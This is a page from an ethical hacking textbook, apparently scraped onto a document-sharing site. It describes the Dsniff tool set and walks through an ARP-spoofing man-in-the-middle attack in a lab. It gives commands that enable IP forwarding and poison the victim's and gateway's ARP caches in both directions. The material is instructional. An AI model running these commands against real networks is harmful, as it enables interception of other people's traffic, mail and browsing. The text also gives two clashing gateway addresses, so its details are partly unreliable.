Ethical Hacking and Penetration Testing Guide



Yüklə 22,44 Mb.
Pdf görüntüsü
səhifə94/235
tarix07.08.2023
ölçüsü22,44 Mb.
#138846
1   ...   90   91   92   93   94   95   96   97   ...   235
Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Tools of the Trade
Now, let’s talk about some of the popular tools that could be used to perform Man in the Middle 
attacks.
Dsniff
Dsniff is called the Swiss army knife of command line ARP spoofing tools. It includes many tools 
to sniff various types of traffic. The most popular of them is ARP spoof, which would be demon-
strated next. Dsniff is not developed or updated any more, but the tool still works and is great for 
performing Man in the middle attacks.
The set of tools include the following:

Arpspoof
—Used for poisoning the ARP cache by forging ARP replies

Mailsnarf
—Used to sniff e-mail messages sent from protocols like SMTP and POP

Msgsnaf
—Sniffs all the IM messaging conversations

Webspy
—Used to sniff all the URLs that a victim has visited via his browser and later use 
to open it in our browser

Urlsnarf
—Sniffs all the URLs

Macof
—Used to perform a MAC flooding attack
Using ARP Spoof to Perform MITM Attacks
Before we perform a man in the middle attack, we need to enable IP forwarding so that the traffic 
could be forwarded to the destination. In order to enable it, we will use the following command:
echo 1 >/proc/sys/net/ipv4/ip_forward
We can confirm that port forwarding is enabled by using the cat command to display the contents 
of the 
ip _ forward file
. “1” means that IP forwarding is enabled; “0” means it’s disabled.
Now that we have enabled IP forwarding, we need to gather the following information to 
perform an man in the middle attack:
1. Attacker’s IP
2. Victim’s IP
3. Default gateway


146
◾ 
Ethical Hacking and Penetration Testing Guide
Attacker’s IP
—This will be the IP address of my BackTrack machine, which is 192.168.75.138.
Victim’s IP
—My victim is a Windows XP machine, which has an IP 192.168.75.142.
Default gateway
—The default gateway is the IP address of my router, which is 192.168.75.142.
Next, we would take a note of the victim’s MAC addresses associated with each of them. 
We can view the MAC addresses
 
in the ARP cache:
From this ARP cache, we can see that we have the MAC address of the default gateway 
(192.168.75.2) and our machine (192.168.75.138). So what we would like to do is to tell the 
default gateway that the victim’s IP address is associated with our MAC address and vice versa. 
Let’s try ARP spoof to do this job.
Usage
The basic syntax for arpspoof is as follows:
arpspoof –i [Interface] –t [Target Host]
In this case, our interface is “eth0,” and our targets are 192.168.75.2 (gateway) and 
192.168.75.142 (victim). So our command would be as follows:
arpspoof –i eth0 –t 192.168.75.142 192.168.75.2
On taking a look at the ARP cache again, we figure out that the gateway MAC address has 
been replaced with our MAC address. So anything that the victim sends to the gateway will be 
forwarded to us.


Network Sniffing
◾ 
147
We also need to issue the same command in a reverse manner because when we are in the 
middle and we need to send ARP replies both ways.
arpspoof –I eth0 –t 192.168.75.2 192.168.75.142
If we take a look at the ARP cache of the victim’s machine now, we will find our MAC address 
associated with both IP addresses (default gateway and victim).

Yüklə 22,44 Mb.

Dostları ilə paylaş:
1   ...   90   91   92   93   94   95   96   97   ...   235




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin